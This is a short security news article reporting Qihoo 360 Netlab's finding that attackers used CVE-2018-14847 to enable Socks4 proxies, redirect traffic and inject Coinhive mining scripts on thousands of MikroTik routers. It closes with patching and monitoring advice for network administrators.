Your Router from Mikrotik Could Be Spying on You. If you or your company own a Miktotik Router, it could be spying on you or making someone rich at your bandwidth’s expense. Researchers from Qihoo 360 Netlab discovered that hackers are exploiting a vulnerability of these routers to send data packets to IP addresses of their choosing, effectively eavesdropping on you or your company’s internet activity.
It goes without saying that if they ever decrypt those packets, they could stumble upon important transactions, email addresses, credit card numbers, etc.
Your Mikrotik router could be one of over 7500 units with maliciously enabled Socks4 proxies and injected crypto-mining scripts. This number could grow as the attackers continuously scan for other vulnerable routers using yours. There are about 370,000 more routers out there that are potentially vulnerable to this attack.
That number may seem small but one router can service one to several hundred users connected to the internet. Most of the affected routers are from Brazil, the United States, India and Russia, with Russia as being the most affected; which makes sense given that Mikrotik is a Latvian communications company and distributions in Russia would be more prevalent.
The attackers use a previously disclosed vulnerability used by the CIA known as the Winbox Any Directory File Read (CVE-2018-14847). This vulnerability found in Mikrotik routers can allow attackers to maliciously enable the Socks4 proxy through malware, bypass the network’s firewall and eavesdrop on network traffic by transmitting data packets to the attackers. Aside from network eavesdropping, the attackers could inject crypto-mining scripts (Coinhive) into your network’s HTTP 403 page, meaning every time a user is denied access to a web page, someone gets richer.
…By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users’ devices… What is disappointing for the attacker though, the mining code does not work in this way, because all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs set by attackers themselves.
The attackers also check on barely used ports namely SNMP 161 and 162 for some unknown purpose. Something administrators need to check into.
We also noticed the SNMP port 161 and 162 are also top on the list. This deserve some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users’ network SNMP community strings?
The solution is for network administrators to patch the known vulnerability through security updates rolled out by Mikrotik. But as per the Chinese researchers, there are over a million more routers out there that are vulnerable despite the patch. Reboots won’t help either as the infected machines will transmit updated IP addresses of the routers.
Though given time, if the problem is not patched, the hackers could find a way to circumvent the Coinhive problem. Administrators are also urged to continue checking their HTTP and Socks4 proxy traffic for signs of attacks. Netlab also recommends that Mikrotik come up with a patch to add an internet-inbound denial function to their Webfig and Winbox ports.